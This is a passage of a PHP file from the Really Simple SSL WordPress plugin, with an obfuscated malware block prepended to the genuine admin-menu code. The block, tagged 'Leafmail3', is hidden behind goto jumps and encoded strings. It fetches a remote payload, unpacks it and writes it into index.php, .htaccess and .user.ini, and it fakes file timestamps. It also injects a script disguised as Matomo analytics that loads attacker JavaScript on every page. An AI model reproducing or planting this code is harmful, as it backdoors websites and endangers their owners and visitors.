<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?> <?php defined('ABSPATH') or die(); /** * Enqueue Gutenberg block assets for backend editor. * * @since 1.0.0 */ require_once(rsssl_path.'settings/config/config.php'); require_once(rsssl_path.'settings/config/menu.php'); require_once(rsssl_path.'settings/config/disable-fields-filter.php'); /** * Fix for WPML issue where WPML breaks the rest api by adding a language locale in the url * * @param $url * @param $path * @param $blog_id * @param $scheme * * @return string */ function rsssl_fix_rest_url_for_wpml($url, $path, $blog_id, $scheme) { if (strpos($url, 'reallysimplessl/v') === false) { return $url; } $current_language = false; if (function_exists('icl_register_string')) { $current_language = apply_filters('wpml_current_language', null); } if (function_exists('qtranxf_getLanguage')) { $current_language = qtranxf_getLanguage(); } if ($current_language) { if (strpos($url, '/'.$current_language.'/wp-json/')) { $url = str_replace('/'.$current_language.'/wp-json/', '/wp-json/', $url); } } return $url; } add_filter('rest_url', 'rsssl_fix_rest_url_for_wpml', 10, 4); /** * WordPress doesn't allow for translation of chunks resulting of code splitting. * Several workarounds have popped up in JetPack and Woocommerce: https://developer.wordpress.com/2022/01/06/wordpress-plugin-i18n-webpack-and-composer/ * Below is mainly based on the Woocommerce solution, which seems to be the most simple approach. Simplicity is king here. * * @return array */ function rsssl_get_chunk_translations($path = 'settings/build' ) { //get all files from the settings/build folder $files = scandir(rsssl_path . $path ); $json_translations = []; // filter the filenames to get the JavaScript and asset filenames $jsFilename = ''; $assetFilename = ''; foreach ($files as $file) { if (strpos($file, 'index.') === 0) { if (substr($file, -3) === '.js') { $jsFilename = $file; } elseif (substr($file, -10) === '.asset.php') { $assetFilename = $file; } } if (strpos($file, '.js') === false) { continue; } $chunk_handle = str_replace('.js', '', $file ); //temporarily register the script, so we can get a translations object. wp_register_script( $chunk_handle, plugins_url('build/'.$file, __FILE__), [], true ); $language_path = defined('rsssl_pro') ? rsssl_path . 'languages' : false; $localeData = load_script_textdomain( $chunk_handle, 'really-simple-ssl', $language_path ); if (!empty($localeData)){ $json_translations[] = $localeData; } wp_deregister_script( $chunk_handle ); } if (empty($jsFilename) || empty($assetFilename) ) { return []; } $assetFile = require( rsssl_path . trailingslashit( $path ) . $assetFilename ); return [ 'json_translations' => $json_translations, 'dependencies' => $assetFile['dependencies'], 'version' => $assetFile['version'], 'js_file' => $jsFilename, ]; } function rsssl_plugin_admin_scripts() { $js_data = rsssl_get_chunk_translations(); // check if the necessary files are found if ( !empty($js_data) ) { $handle = 'rsssl-settings'; wp_enqueue_script( $handle); wp_enqueue_script( 'rsssl-settings', plugins_url( 'build/' . $js_data['js_file'], __FILE__ ), $js_data['dependencies'], $js_data['version'], true ); wp_set_script_translations($handle, 'really-simple-ssl'); wp_localize_script( 'rsssl-settings', 'rsssl_settings', apply_filters('rsssl_localize_script', [ 'json_translations' => $js_data['json_translations'], 'menu' => rsssl_menu(), 'is_bf' => RSSSL()->admin->is_bf(), 'site_url' => get_rest_url(), 'plugins_url' => admin_url('update-core.php'), 'admin_ajax_url' => add_query_arg( array( 'type' => 'errors', 'action' => 'rsssl_rest_api_fallback' ), admin_url('admin-ajax.php') ), 'dashboard_url' => rsssl_admin_url(), 'letsencrypt_url' => rsssl_letsencrypt_wizard_url(), 'le_generated_by_rsssl' => rsssl_generated_by_rsssl(), 'upgrade_link' => rsssl_link('pro', 'upgrade' ), 'ref' => rsssl_get_url_ref(), 'plugin_url' => rsssl_url, 'network_link' => network_site_url('plugins.php'), 'pro_plugin_active' => defined('rsssl_pro'), 'networkwide_active' => !is_multisite() || rsssl_is_networkwide_active(),//true for single sites and network wide activated 'nonce' => wp_create_nonce('wp_rest'),//to authenticate the logged-in user 'rsssl_nonce' => wp_create_nonce('rsssl_nonce'), 'wpconfig_fix_required' => RSSSL()->admin->do_wpconfig_loadbalancer_fix() && ! RSSSL()->admin->wpconfig_has_fixes() && ! RSSSL()->admin->uses_bitnami(), 'cloudflare' => rsssl_uses_cloudflare(), ]) ); } } /** * Check if this server is behind CloudFlare * * @return bool */ function rsssl_uses_cloudflare(): bool { return isset( $_SERVER['HTTP_CF_CONNECTING_IP'] ); } /** * Add SSL menu * * @return void */ function rsssl_add_top_level_menu() { if ( ! rsssl_user_can_manage() ) { return; } if ( is_multisite() && rsssl_is_networkwide_active() ) { return; } $count = RSSSL()->admin->count_plusones(); $update_count = $count > 0 ? "<span class='update-plugins rsssl-update-count'><span class='update-count'>$count</span></span>" : ""; $icon_svg = '<?xml version="1.0" encoding="UTF-8"?> <svg id="rss-menu-logo" xmlns="http://www.w3.org/2000/svg" viewBox="0 -15 90 130" width="34" height="34"> <defs> <style>.cls-1{fill:#fff;stroke-width:0px;}</style> </defs> <g fill="none" stroke-width="2"> <path class="cls-1" d="M72.92,26.6h-13v-9.4c0-7.6-6.1-13.7-13.7-13.7s-13.8,6.1-13.8,13.7v9.4h-13.1v-9.4C19.32,2.4,31.32,-9.6,46.12,-9.6s26.8,12,26.8,26.8v9.4h0Z"/> <rect class="cls-1" x="10.02" y="84.6" width="72.3" height="5.6"/> <path class="cls-1" d="M82.32,82H10.02V31.8c0-2.9,2.3-5.2,5.2-5.2h61.9c2.9,0,5.2,2.3,5.2,5.2V82h0ZM64.62,37.8c-2.2-2.2-5.9-2.2-8.2,0l-15.7,15.3l-4.9-4.9c-2.2-2.2-5.9-2.2-8.2,0l-1.9,1.9c-2.2,2.2-2.2,5.9,0,8.2l8.5,8.5c0.1,0.2,0.3,0.4,0.5,0.6l1.9,1.9l4.2,4l3.5-3.5c0.2-0.1,0.4-0.3,0.6-0.5l1.9-1.9c0.2-0.2,0.4-0.4,0.5-0.6l19.1-18.9c2.2-2.2,2.2-5.9,0-8.2l-1.8-1.9Z"/> </g> </svg>'; $icon_base64 = 'data:image/svg+xml;base64,' . base64_encode($icon_svg); $page_hook_suffix = add_menu_page( __( "Security", "really-simple-ssl" ), __( "Security", "really-simple-ssl" ) . $update_count, 'manage_security', 'really-simple-security', 'rsssl_settings_page', $icon_base64, 100 // This will place it near the bottom of the menu ); add_action( "admin_print_scripts-{$page_hook_suffix}", 'rsssl_plugin_admin_scripts' ); // Update the page title to prevent issues with an empty title causing strip_tags deprecation warnings add_action("load-{$page_hook_suffix}", 'rsssl_set_admin_page_title'); add_action('admin_head', 'rsssl_override_wordpress_svg_size'); } add_action( 'admin_menu', 'rsssl_add_top_level_menu' ); function 